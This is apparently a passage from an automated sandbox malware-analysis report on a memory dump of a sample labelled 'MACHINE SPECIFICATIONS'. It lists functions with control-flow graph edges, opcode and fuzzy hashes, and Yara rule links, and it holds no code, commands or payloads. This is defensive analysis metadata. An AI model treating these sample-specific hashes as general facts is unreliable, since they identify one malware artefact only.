                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: {kHh^
                                                                                    • API String ID: 0-1927296958
                                                                                    • Opcode ID: 9b41694dc5fd74650554fe7c325c0aa32ff6060f3542a34ae7cef27844f3dd71
                                                                                    • Instruction ID: 5e09083cde71f8911b4e3a800fd1a75a7cfd6e78101f5e3edb04c453137567ce
                                                                                    • Opcode Fuzzy Hash: 9b41694dc5fd74650554fe7c325c0aa32ff6060f3542a34ae7cef27844f3dd71
                                                                                    • Instruction Fuzzy Hash: E381C374B002099FCB58EBB4D8946AEB7BAFF85304F10C469D90ADB384EF309D458B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580A370 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1113 580a370-580a382 1115 580a3e2-580a3eb 1113->1115 1116 580a384-580a392 1113->1116 1117 580a3f5-580a420 1115->1117 1118 580a3ed-580a3f3 1115->1118 1119 580a394-580a397 1116->1119 1120 580a399 1116->1120 1134 580a422-580a42d 1117->1134 1135 580a42e-580a43c 1117->1135 1118->1117 1121 580a39b-580a3a0 1119->1121 1120->1121 1123 580a3a2-580a3a8 1121->1123 1124 580a3bc-580a3c1 1121->1124 1126 580a3aa 1123->1126 1127 580a3ad-580a3b9 1123->1127 1128 580a3d0-580a3d3 1124->1128 1129 580a3c3-580a3c6 1124->1129 1126->1127 1158 580a3d5 call 580a370 1128->1158 1159 580a3d5 call 580a35f 1128->1159 1129->1128 1132 580a3db-580a3df 1134->1135 1136 580a4a5-580a4ae 1135->1136 1137 580a43e-580a449 1135->1137 1138 580a4b0-580a4b6 1136->1138 1139 580a4b8-580a4f3 1136->1139 1140 580a450 1137->1140 1141 580a44b-580a44e 1137->1141 1138->1139 1142 580a452-580a457 1140->1142 1141->1142 1143 580a481-580a486 1142->1143 1144 580a459-580a45f 1142->1144 1149 580a494-580a498 call 580a090 1143->1149 1150 580a488-580a48a 1143->1150 1147 580a461-580a464 1144->1147 1148 580a466 1144->1148 1151 580a468-580a47e 1147->1151 1148->1151 1154 580a49d-580a4a2 1149->1154 1150->1149 1158->1132 1159->1132
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8c$k
                                                                                    • API String ID: 0-1975657309
                                                                                    • Opcode ID: f4caad9df7b275bf8a4405ca8c17d251b9a4ad30bd516cd72343aadaddaa0bae
                                                                                    • Instruction ID: e33044f45082a18902e9327f87424dc2575d7c1a7d497601900456542fbc3c3f
                                                                                    • Opcode Fuzzy Hash: f4caad9df7b275bf8a4405ca8c17d251b9a4ad30bd516cd72343aadaddaa0bae
                                                                                    • Instruction Fuzzy Hash: E341FC357043148FDB99DB28D844A6AB7E6FF85364B15817AED09CB340DB31EC45C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580CDD3 Relevance: .4, Instructions: 353COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1932 580cdd3-580cddc 1933 580cdf5-580cdff 1932->1933 1934 580cdde-580cded 1932->1934 1935 580ce01-580ce2c 1933->1935 1936 580ce34-580ce45 1933->1936 1934->1933 1935->1936 1940 580ce47-580ce4c 1936->1940 1941 580ce5d-580ce64 1936->1941 1943 580cf98-580cfbe call 5801040 call 5801070 1940->1943 1944 580ce66-580ce75 1941->1944 1945 580ce7d-580ce87 1941->1945 1971 580cfc4-580d005 call 5801040 call 5801070 1943->1971 1972 580d078-580d07c 1943->1972 1944->1945 1947 580ce89-580ceb4 1945->1947 1948 580cebc-580cec3 1945->1948 1947->1948 1951 580cff2-580cff8 1948->1951 1952 580cec9-580ced0 1948->1952 1951->1943 1956 580ced2-580cee1 1952->1956 1957 580cee9-580cef3 1952->1957 1956->1957 1958 580cef5-580cf20 1957->1958 1959 580cf28-580cf4f 1957->1959 1958->1959 1979 580cf55-580cf5c 1959->1979 1980 580d108-580d111 1959->1980 2022 580d051-580d064 1971->2022 2023 580d007-580d014 1971->2023 1977 580d0a4-580d0ab 1972->1977 1978 580d07e-580d092 1972->1978 1982 580d0b1-580d0d7 1977->1982 1983 580d193-580d1c1 1977->1983 1978->1977 1994 580d094-580d09c 1978->1994 1984 580cf75-580cf90 call 5801070 1979->1984 1985 580cf5e-580cf6d 1979->1985 1986 580d113-580d119 1980->1986 1987 580d11b-580d182 1980->1987 2000 580d0df-580d0ea 1982->2000 1983->2000 2007 580cf92 1984->2007 2008 580cfed-580cff0 1984->2008 1985->1984 1986->1987 1987->1972 1994->1977 2012 580d0f0-580d1ca 2000->2012 2013 580cccb-580ccdb 2000->2013 2011 580cf95 2007->2011 2008->2011 2011->1943 2015 580d1d5-580d24a 2012->2015 2016 580d1cc 2012->2016 2020 580cce8-580ccef 2013->2020 2021 580ccdd-580cce6 2013->2021 2042 580d255-580d277 2015->2042 2043 580d24c 2015->2043 2016->2015 2024 580ccf1-580ccf7 2020->2024 2025 580ccf9-580ccfc 2020->2025 2029 580ccff-580cd24 2021->2029 2026 580d066-580d06a 2022->2026 2035 580d016-580d019 2023->2035 2036 580d01b 2023->2036 2024->2029 2025->2029 2030 580d075 2026->2030 2031 580d06c 2026->2031 2044 580cd26-580cd35 2029->2044 2045 580cd3d-580cd47 2029->2045 2030->1972 2031->2030 2038 580d01e-580d02d 2035->2038 2036->2038 2048 580d044-580d04f 2038->2048 2049 580d02f-580d042 2038->2049 2052 580d281-580d2d2 2042->2052 2053 580d279-580d27f 2042->2053 2043->2042 2044->2045 2050 580cd49-580cd64 2045->2050 2051 580cd6c-580cd6f 2045->2051 2048->2022 2048->2023 2049->2026 2050->2051 2057 580cd78-580cd86 2051->2057 2053->2052 2063 580cd88-580cdaa 2057->2063 2064 580cdac-580cdc5 2057->2064 2063->2064 2066 580cdd0 2064->2066 2067 580cdc7 2064->2067 2066->1932 2067->2066
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0ca7f2b4b25cc990f85a16a570a2ecf89132708164e7143f0f41e6bf8fb43388
                                                                                    • Instruction ID: 63790162a156698fa43e88fa4af28433c3586bde529880781720e1b8e5712177
                                                                                    • Opcode Fuzzy Hash: 0ca7f2b4b25cc990f85a16a570a2ecf89132708164e7143f0f41e6bf8fb43388
                                                                                    • Instruction Fuzzy Hash: D1E13C74A01209CFDB54DFA4C888A6DBBB6FF45308F509429E80ADB3A5DB71AC46CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580F150 Relevance: .3, Instructions: 297COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2368 580f150-580f165 2369 580f3a3-580f3ac 2368->2369 2370 580f16b-580f179 2368->2370 2371 580f3b6-580f401 2369->2371 2372 580f3ae-580f3b4 2369->2372 2373 580f180 2370->2373 2374 580f17b-580f17e 2370->2374 2393 580f403-580f409 2371->2393 2394 580f40a-580f417 2371->2394 2372->2371 2375 580f182-580f187 2373->2375 2374->2375 2376 580f189-580f1e9 2375->2376 2377 580f1fe-580f204 2375->2377 2413 580f1f0 2376->2413 2414 580f1eb-580f1ee 2376->2414 2380 580f206-580f209 2377->2380 2381 580f20b 2377->2381 2383 580f20d-580f212 2380->2383 2381->2383 2385 580f214-580f226 2383->2385 2386 580f239-580f23f 2383->2386 2398 580f228-580f22b 2385->2398 2399 580f22d 2385->2399 2387 580f241-580f244 2386->2387 2388 580f246 2386->2388 2391 580f248-580f24d 2387->2391 2388->2391 2395 580f27a-580f280 2391->2395 2396 580f24f-580f261 2391->2396 2407 580f420-580f422 2394->2407 2408 580f419-580f41f 2394->2408 2401 580f282-580f285 2395->2401 2402 580f287 2395->2402 2411 580f263-580f266 2396->2411 2412 580f268 2396->2412 2400 580f22f-580f234 2398->2400 2399->2400 2425 580f399-580f3a0 2400->2425 2406 580f289-580f28e 2401->2406 2402->2406 2416 580f290-580f296 2406->2416 2417 580f2ac-580f2b2 2406->2417 2409 580f424-580f437 2407->2409 2410 580f44b-580f455 call 5808c20 2407->2410 2443 580f439-580f43f 2409->2443 2444 580f4ae-580f4b7 2409->2444 2433 580f4a6-580f4ad 2410->2433 2434 580f457-580f464 2410->2434 2423 580f26a-580f275 2411->2423 2412->2423 2420 580f1f2-580f1f9 2413->2420 2414->2420 2418 580f298-580f29b 2416->2418 2419 580f29d 2416->2419 2421 580f2b4-580f2b7 2417->2421 2422 580f2b9 2417->2422 2426 580f29f-580f2a7 2418->2426 2419->2426 2420->2425 2428 580f2bb-580f2c0 2421->2428 2422->2428 2423->2425 2426->2425 2430 580f2c2-580f2c6 2428->2430 2431 580f2f6-580f2fc 2428->2431 2440 580f2c8-580f2d2 2430->2440 2441 580f2da-580f2e0 2430->2441 2438 580f303 2431->2438 2439 580f2fe-580f301 2431->2439 2434->2433 2442 580f466-580f477 2434->2442 2445 580f305-580f30a 2438->2445 2439->2445 2440->2441 2446 580f2e2-580f2e5 2441->2446 2447 580f2e7 2441->2447 2442->2433 2459 580f479-580f48a 2442->2459 2443->2444 2449 580f441-580f449 2443->2449 2450 580f30c-580f31e 2445->2450 2451 580f32e-580f341 call 5802a98 2445->2451 2448 580f2e9-580f2f1 2446->2448 2447->2448 2448->2425 2449->2410 2449->2444 2462 580f320-580f323 2450->2462 2463 580f325 2450->2463 2460 580f343-580f36d 2451->2460 2461 580f374-580f37f 2451->2461 2459->2433 2472 580f48c-580f49d 2459->2472 2460->2461 2464 580f381-580f384 2461->2464 2465 580f38e-580f391 2461->2465 2466 580f327-580f32c 2462->2466 2463->2466 2464->2465 2465->2425 2466->2425 2472->2433 2475 580f49f 2472->2475 2475->2433
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a2f5ee0f82992a9f8950006d98e98570345a66c2ad74f6776502798ddacb653b
                                                                                    • Instruction ID: 0f595807b4d73ed73654449f42d9b352cdef7f732c6be622917f337db17f4206
                                                                                    • Opcode Fuzzy Hash: a2f5ee0f82992a9f8950006d98e98570345a66c2ad74f6776502798ddacb653b
                                                                                    • Instruction Fuzzy Hash: 96A1C135B096158FD7B8DB68D890B69B7A6FF85224F05D069DE09CB3A1CB31EC45CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058067DD Relevance: .2, Instructions: 200COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94ea440c96adc2fd77cae433ebf2b66ba4a5fb10cf2da5ed5a25b326e7be9ac0
                                                                                    • Instruction ID: 38eed540fc5f2a32b49c7d2933d0f8895773c8d89fee83dd150f083d405473c7
                                                                                    • Opcode Fuzzy Hash: 94ea440c96adc2fd77cae433ebf2b66ba4a5fb10cf2da5ed5a25b326e7be9ac0
                                                                                    • Instruction Fuzzy Hash: A0714B356083884FCB01EB78D861BAD7FB6AF46218F15819ADD42CB2A3DF358C49CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580CC00 Relevance: .2, Instructions: 193COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9f0e3076a4dab32fc29633841c853869c3f7be050b21b061880ddf7fb0f6054
                                                                                    • Instruction ID: 722f21adbcb92ac0bc2287c8f8a7734f7e942259c3bb0755f8083bac3358ba58
                                                                                    • Opcode Fuzzy Hash: d9f0e3076a4dab32fc29633841c853869c3f7be050b21b061880ddf7fb0f6054
                                                                                    • Instruction Fuzzy Hash: EA812874A05249CFCB54DFA4D898AADBBF6BF48304F149129E806EB395DB70AC45CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05801D88 Relevance: .2, Instructions: 192COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 73739cee9020aa1fd8c669a9b17e0c8f2b2f5b2f8b783b003e5b6a803d5090ec
                                                                                    • Instruction ID: e5c3428f6af6e1ba85e2fcb31dcd5a6b6e465c7ac054b66bb0f46915ea172298
                                                                                    • Opcode Fuzzy Hash: 73739cee9020aa1fd8c669a9b17e0c8f2b2f5b2f8b783b003e5b6a803d5090ec
                                                                                    • Instruction Fuzzy Hash: CA716C74A012059FCB19DF65D898A6DBBF3FF98314B508069E806D7391DB34ED46CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05804B50 Relevance: .2, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d4e5b4f103f333239883e10e5e3b26e51e4be4302b372cbeaeec40a15ab909fa
                                                                                    • Instruction ID: 49a45560254a005beb4b56397b126251a2d58481faec2a29d1d3d8962f288aac
                                                                                    • Opcode Fuzzy Hash: d4e5b4f103f333239883e10e5e3b26e51e4be4302b372cbeaeec40a15ab909fa
                                                                                    • Instruction Fuzzy Hash: 43517D34B042048FDB94EB69C494AAA7BF6FF89324F159068ED02DB3A0DB35DC45CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05809F48 Relevance: .2, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb204d55a87d31a0a641428c744b74718806f9ddd29dcaf3f50cb860934c7659
                                                                                    • Instruction ID: eb865c34a39a2e5450a74050ee03c3fec1340d950aea22b338751d6d62c606d3
                                                                                    • Opcode Fuzzy Hash: bb204d55a87d31a0a641428c744b74718806f9ddd29dcaf3f50cb860934c7659
                                                                                    • Instruction Fuzzy Hash: 7F51D1357042008FC729AB78DC5466EBBEAFFC9616B148479E90AD7795DF30EC068B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05809D60 Relevance: .2, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 75466c3c4e03cbf1ddbe48bbeaac59391b21b229a67f78942fd29ca49793124e
                                                                                    • Instruction ID: 9839a355bf4b20f1671a7ca95f04b7b5c9cd03635300215443bf7b0bb17bebfe
                                                                                    • Opcode Fuzzy Hash: 75466c3c4e03cbf1ddbe48bbeaac59391b21b229a67f78942fd29ca49793124e
                                                                                    • Instruction Fuzzy Hash: 0551DE357042098BCB54EF74D854A7E77AAEF85319F14883AE90AC7381EF30DC0A8B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05804AB0 Relevance: .1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54242a0545597980e21d2fb51b85d321899034e47ae76727df761d1ae36cb796
                                                                                    • Instruction ID: 0ab2296eafdccdde8651ce6f802f762b1c6536a27b00b680cc2ddd395849b6e7
                                                                                    • Opcode Fuzzy Hash: 54242a0545597980e21d2fb51b85d321899034e47ae76727df761d1ae36cb796
                                                                                    • Instruction Fuzzy Hash: 59519D34A443489FDB54DF65D894AAD7BF6FF49320F1490A8E902EB3A1DB309C85CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05803940 Relevance: .1, Instructions: 142COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af810987284b6ed8b64bf153602a7e51538da34cda51114e0d0e6dd46c1c7d1a
                                                                                    • Instruction ID: 167a065076399b4ce2e4d3ab46b39324ff3416814a3cbdfd1ac4e527bbb3147a
                                                                                    • Opcode Fuzzy Hash: af810987284b6ed8b64bf153602a7e51538da34cda51114e0d0e6dd46c1c7d1a
                                                                                    • Instruction Fuzzy Hash: 16512B71B042058FCB54DF35C880A6ABBA6FF91318F05C86AD505CB3A1EF31EC0A8791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580A900 Relevance: .1, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d03fe3184c91d30ff930806fb321e4b933285270959b34df580d4e2054cd9032
                                                                                    • Instruction ID: 41ee1e09f0582f0b9c424adfa3378b78d2809cbcfcd30ab1ead429237a0cfc0f
                                                                                    • Opcode Fuzzy Hash: d03fe3184c91d30ff930806fb321e4b933285270959b34df580d4e2054cd9032
                                                                                    • Instruction Fuzzy Hash: 9B5157347006058FCB68DF24ED9896EBBF2BB88201B55D069E806C7295DF30AD02CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580CBF0 Relevance: .1, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aeab4195b36d802a9bf999608599aac1b33c63c2d08a30751c39242df2c891d1
                                                                                    • Instruction ID: d898ea7221bf61dc136a811b2d60754325addaa890bfacdcfdc9b4bf3e600e11
                                                                                    • Opcode Fuzzy Hash: aeab4195b36d802a9bf999608599aac1b33c63c2d08a30751c39242df2c891d1
                                                                                    • Instruction Fuzzy Hash: 71512974A012498FCB54DFA5D888AADBBF2BF88304F549529E806EB395DB30AC45CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580D1D8 Relevance: .1, Instructions: 123COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c17e0bc2d022eb483658111c4c0d7f43c91be1da5d55b391dc49ee2e92bb4426
                                                                                    • Instruction ID: 13d4e9051ca43a0026f9c4a4121f2fc490beec6c8a38bcc61beac85bfe449660
                                                                                    • Opcode Fuzzy Hash: c17e0bc2d022eb483658111c4c0d7f43c91be1da5d55b391dc49ee2e92bb4426
                                                                                    • Instruction Fuzzy Hash: B351F474A11209CFDB54DFA4D898AADBBB2BF84304F509119E806EB2A5CB30AC45CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580ED70 Relevance: .1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23e12e96df390a1733dfeb0adb897bbb1301918980dcb6febc1772f9725cae01
                                                                                    • Instruction ID: a773e50400358a55d2159fbe118cc5b0a07e90ac20304a7bee27ba9b8c42472c
                                                                                    • Opcode Fuzzy Hash: 23e12e96df390a1733dfeb0adb897bbb1301918980dcb6febc1772f9725cae01
                                                                                    • Instruction Fuzzy Hash: B3413A78A00219CFCB14DF64D889A6EBBB6FF88314B108959ED069B394DF31AC45CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05805F80 Relevance: .1, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0931a1b1b00be845784cce62df80959556c2f9edc40c42bf080aea86e5f033c0
                                                                                    • Instruction ID: 49b6fa539ddd60a465b8e8654beb55a735acdb356f5c21cf090c076d210e3306
                                                                                    • Opcode Fuzzy Hash: 0931a1b1b00be845784cce62df80959556c2f9edc40c42bf080aea86e5f033c0
                                                                                    • Instruction Fuzzy Hash: 2B41DA75B042049FEB55AB74C85862E7BA6FF85304F10846AD806EB7C1EF709C498B92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05808C70 Relevance: .1, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f777cefcaf61f0bd8060ed161b4e45bb22e9fb35f5cf59acaf66d25da9e49f48
                                                                                    • Instruction ID: faae4e46721ca34394987024ef73e5b7e81510cfe1dbd9ea36680d950aec964c
                                                                                    • Opcode Fuzzy Hash: f777cefcaf61f0bd8060ed161b4e45bb22e9fb35f5cf59acaf66d25da9e49f48
                                                                                    • Instruction Fuzzy Hash: 833124317052009FC764AB78D858A3E77EAFFC5225B558579E90ACB394DF30EC4A8B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0580EF28 Relevance: .1, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1fa282fa20f4766068b868084f43b63f7829cdd8f8b2782dd5453117ca198dcd
                                                                                    • Instruction ID: d5b393274ebf173edb4b5d8ae4fd1bfbea805783d99f9b11ef266055caea51ff
                                                                                    • Opcode Fuzzy Hash: 1fa282fa20f4766068b868084f43b63f7829cdd8f8b2782dd5453117ca198dcd
                                                                                    • Instruction Fuzzy Hash: BE418C75B002159FCB14DF65D89896EBBBAFF88600B14806AED05DB390DB30ED01CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05805DF0 Relevance: .1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b222999ca7f115571d6460c68525622fb08f0e7d7a4fe21ebc13ce836abba0a0
                                                                                    • Instruction ID: 219b2faef2234abc9c21c84d6bc75c26d6f07b4eea6d461bf4be8909667448b8
                                                                                    • Opcode Fuzzy Hash: b222999ca7f115571d6460c68525622fb08f0e7d7a4fe21ebc13ce836abba0a0
                                                                                    • Instruction Fuzzy Hash: AE31F131B042049FCB54AB68D848B6A7BEAEF89314F148429E90AD73C0DF74AC42CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 05805577 Relevance: .1, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_5800000_MACHINE SPECIFICATIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e11dd404af4b109a8c485885d5b38e9056c9a6f7012041a71791734062d99b1b
                                                                                    • Instruction ID: 551f15a6acbdb6ae003b157aae652298a7fac060427c54fec9b520694b77529d
                                                                                    • Opcode Fuzzy Hash: e11dd404af4b109a8c485885d5b38e9056c9a6f7012041a71791734062d99b1b
                                                                                    • Instruction Fuzzy Hash: 9041F734A04108CFDB44EFA4C998AADBBB6FF49305F158068E506AB3B5DB34AD45CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 058089E0 Relevance: .1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.370996804.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
